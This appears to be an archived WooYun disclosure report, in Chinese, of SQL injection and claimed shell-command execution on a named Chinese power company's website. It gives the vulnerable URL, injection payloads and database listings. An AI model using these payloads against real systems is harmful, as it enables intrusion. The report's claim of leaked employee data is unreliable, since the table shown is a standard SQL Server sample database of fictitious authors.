中国华电集团注入泄露大量员工信息（可执行shell命令）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098005

漏洞标题：中国华电集团注入泄露大量员工信息（可执行shell命令）

漏洞作者：路人甲

提交时间：2015-03-12 16:50

修复时间：2015-04-26 16:52

公开时间：2015-04-26 16:52

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-12：细节已通知厂商并且等待厂商处理中
2015-03-16：厂商已经确认，细节仅向厂商公开
2015-03-26：细节向核心白帽子及相关领域专家公开
2015-04-05：细节向普通白帽子公开
2015-04-15：细节向实习白帽子公开
2015-04-26：细节向公众公开

简要描述：

中国华电集团注入泄露大量员工信息，另外可以执行shell命令控制服务器

详细说明：

中国华电集团注入泄露大量员工信息（firstname、lastname、qq、e-mail、电话……），另外可以执行shell命令控制服务器……
不是国企吗？？怎么员工这么多洋人呢？？！！！唉~

漏洞证明：

问题链接：
http://www.chdmy.com.cn/qzlx/ShowNews.jsp?NewsID=7277

---
Place: GET
Parameter: NewsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: NewsID=7277' AND 8517=8517 AND 'zgul'='zgul
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: NewsID=7277'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: NewsID=7277' WAITFOR DELAY '0:0:5'--
---
[20:09:50] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000

数据库：

available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] www

随便看几个就有很多信息：

Database: msdb
[82 tables]
+-----------------------------+
| RTblClassDefs               |
| RTblDBMProps                |
| RTblDBXProps                |
| RTblDTMProps                |
| RTblDTSProps                |
| RTblDatabaseVersion         |
| RTblEQMProps                |
| RTblEnumerationDef          |
| RTblEnumerationValueDef     |
| RTblGENProps                |
| RTblIfaceDefs               |
| RTblIfaceHier               |
| RTblIfaceMem                |
| RTblMDSProps                |
| RTblNamedObj                |
| RTblOLPProps                |
| RTblParameterDef            |
| RTblPropDefs                |
| RTblProps                   |
| RTblRelColDefs              |
| RTblRelshipDefs             |
| RTblRelshipProps            |
| RTblRelships                |
| RTblSIMProps                |
| RTblScriptDefs              |
| RTblSites                   |
| RTblSumInfo                 |
| RTblTFMProps                |
| RTblTypeInfo                |
| RTblTypeLibs                |
| RTblUMLProps                |
| RTblUMXProps                |
| RTblVersionAdminInfo        |
| RTblVersions                |
| RTblWorkspaceItems          |
| backupfile                  |
| backupmediafamily           |
| backupmediaset              |
| backupset                   |
| log_shipping_databases      |
| log_shipping_monitor        |
| log_shipping_plan_databases |
| log_shipping_plan_history   |
| log_shipping_plans          |
| log_shipping_primaries      |
| log_shipping_secondaries    |
| logmarkhistory              |
| mswebtasks                  |
| restorefile                 |
| restorefilegroup            |
| restorehistory              |
| sqlagent_info               |
| sysalerts                   |
| syscachedcredentials        |
| syscategories               |
| sysconstraints              |
| sysdbmaintplan_databases    |
| sysdbmaintplan_history      |
| sysdbmaintplan_jobs         |
| sysdbmaintplans             |
| sysdownloadlist             |
| sysdtscategories            |
| sysdtspackagelog            |
| sysdtspackages              |
| sysdtssteplog               |
| sysdtstasklog               |
| sysjobhistory               |
| sysjobs                     |
| sysjobs_view                |
| sysjobschedules             |
| sysjobservers               |
| sysjobsteps                 |
| sysnotifications            |
| sysoperators                |
| syssegments                 |
| systargetservergroupmembers |
| systargetservergroups       |
| systargetservers            |
| systargetservers_view       |
| systaskids                  |
| systasks                    |
| systasks_view               |
+-----------------------------+

请看员工信息：（信息量太大只是部分）

Database: pubs
Table: authors
[19 entries]
+-------------+--------------+--------------+----------------------+
| au_fname    | au_lname     | phone        | address              |
+-------------+--------------+--------------+----------------------+
| Abraham     | Bennet       | 415 658-9932 | 6223 Bateman St.     |
| Akiko       | Yokomoto     | 415 935-4228 | 3 Silver Ct.         |
| Albert      | Ringer       | 801 826-0752 | 67 Seventh Av.       |
| Ann         | Dull         | 415 836-7128 | 3410 Blonde St.      |
| Anne        | Ringer       | 801 826-0752 | 67 Seventh Av.       |
| Burt        | Gringlesby   | 707 938-6445 | PO Box 792           |
| Charlene    | Locksley     | 415 585-4620 | 18 Broadway Av.      |
| Cheryl      | Carson       | 415 548-7723 | 589 Darwin Ln.       |
| Dean        | Straight     | 415 834-2919 | 5420 College Av.     |
| Dirk        | Stringer     | 415 843-2991 | 5420 Telegraph Av.   |
| Heather     | McBadden     | 707 448-4982 | 301 Putnam           |
| Innes       | del Castillo | 615 996-8275 | 2286 Cram Pl. #86    |
| Johnson     | White        | 408 496-7223 | 10932 Bigge Rd.      |
| Livia       | Karsen       | 415 534-9219 | 5720 McAuley St.     |
| Marjorie    | Green        | 415 986-7020 | 309 63rd St. #411    |
| Meander     | Smith        | 913 843-0462 | 10 Mississippi Dr.   |
| Michael     | O'Leary      | 408 286-2428 | 22 Cleveland Av. #14 |
| Michel      | DeFrance     | 219 547-9982 | 3 Balding Pl.        |
| Morningstar | Greene       | 615 297-2723 | 22 Graybar House Rd. |
+-------------+--------------+--------------+----------------------+

什么意思！！！？？？国企怎么都是洋人！！！？、firstname和lastname啥的全了
附上信息的表头：

Database: pubs
Table: authors
[9 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| address  | varchar |
| au_fname | varchar |
| au_id    | varchar |
| au_lname | varchar |
| city     | varchar |
| contract | bit     |
| phone    | char    |
| state    | char    |
| zip      | char    |
+----------+---------+

这事是一个数据库随便的table，还有这么多部门！信息量可想而知！！！
----------------------------------------------------------------------------------
可执行命令：
这是执行命令的截图：

可以控制远程关机、重启、添加用户等，

修复方案：

暂不提供此类服务

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-03-16 08:57

厂商回复：

漏洞已处理，感谢关注。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098005

漏洞标题：中国华电集团注入泄露大量员工信息（可执行shell命令）

相关厂商：chdmy.com.cn

漏洞作者：路人甲

提交时间：2015-03-12 16:50

修复时间：2015-04-26 16:52

公开时间：2015-04-26 16:52

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098005

漏洞标题：中国华电集团注入泄露大量员工信息（可执行shell命令）

相关厂商：chdmy.com.cn

漏洞作者： 路人甲

提交时间：2015-03-12 16:50

修复时间：2015-04-26 16:52

公开时间：2015-04-26 16:52

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-098005"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云